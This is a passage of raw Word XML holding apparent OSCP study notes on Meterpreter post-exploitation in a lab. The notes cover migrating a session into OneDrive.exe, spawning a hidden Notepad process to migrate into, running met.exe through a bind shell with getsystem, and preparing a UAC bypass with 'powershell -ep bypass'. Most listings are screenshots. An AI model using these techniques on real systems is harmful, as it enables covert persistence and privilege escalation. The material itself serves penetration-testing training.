          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by entering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the process ID we want to migrate to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000545">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4605338" cy="3133747"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image61.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image61.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4605338" cy="3133747"/>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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 63 shows that we successfully migrated our process to the OneDrive process. When reviewing the process list, we'll find our original process, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with ID 2552, does not exist anymore. Furthermore, we'll notice that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> output contains less information than before. The reason for this is that we are now running in the context of the process with the ID 8052 and therefore, as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000547">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="92" name="image91.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image91.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108"/>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of migrating to an existing process or a situation in which we won't find any suitable processes to migrate to, we can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter command. This command provides the ability to create a new process by specifying a command or program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000549">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To demonstrate this, let's start a hidden Notepad process and migrate to it as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For this, we use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create the process hidden from view and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notepad</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_ as argument for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify the command or program to run. Then, we migrate to the newly spawned process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4338638" cy="1592224"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="256" name="image246.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image246.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4338638" cy="1592224"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 65 shows how we can migrate to the newly spawned Notepad process. Since we used the option </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the Notepad process was spawned without any visual representation. However, the process is still listed in the process list of applications such as the task manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are some Post-Exploitation </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Features. Next, we will learn about Post-Exploitation </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000054F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x2kzg1h8oewb" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000550">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (21.3.2. Post-Exploitation Modules)</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sessions that were created through attack vectors such as the execution of a client-side attack will likely provide us only with an unprivileged shell. But if the target user is a member of the local administrators group, we can elevate our shell to a high integrity level if we can bypass</w:t>
      </w:r>
      <w:hyperlink r:id="rId110">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId111">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">User Account Control</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (UAC).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000553">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the previous section, we migrated our Meterpreter shell to a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OneDrive.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> process that is running at (presumably) medium integrity. For this section, let's repeat the steps from the previous section and then bypass UAC with a Metasploit post-exploitation module to obtain a session in the context of a high integrity level process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000554">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As before, we connect to the bind shell on port 4444 on ITWK01, download and execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elevate our privileges. Then, we use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify the process ID of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OneDrive.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000555">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4704786" cy="3309938"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="379" name="image377.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image377.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="470478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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 66 shows that we are now running in the context of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again. While this is an administrative account, UAC prevents us from performing administrative operations as we learned in previous Modules. Before we attempt to bypass UAC, let's confirm that the current process has the integrity level </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000558">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To display the integrity level of a process, we can use tools such as</w:t>
      </w:r>
      <w:hyperlink r:id="rId113">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId114">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Process Explorer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or third-party PowerShell modules such as</w:t>
      </w:r>
      <w:hyperlink r:id="rId115">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId116">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NtObjectManager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Let's assume the latter is already installed on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000559">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we import the module with</w:t>
      </w:r>
      <w:hyperlink r:id="rId117">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId118">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Import-Module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId119">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId120">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Get-NtTokenIntegrityLevel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display the integrity level of the current process by retrieving and reviewing the assigned access token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4216567" cy="3081338"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="511" name="image503.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image503.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4216567"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Import-Module NtObjectManager</w:t>
      </w:r>
    </w:p>
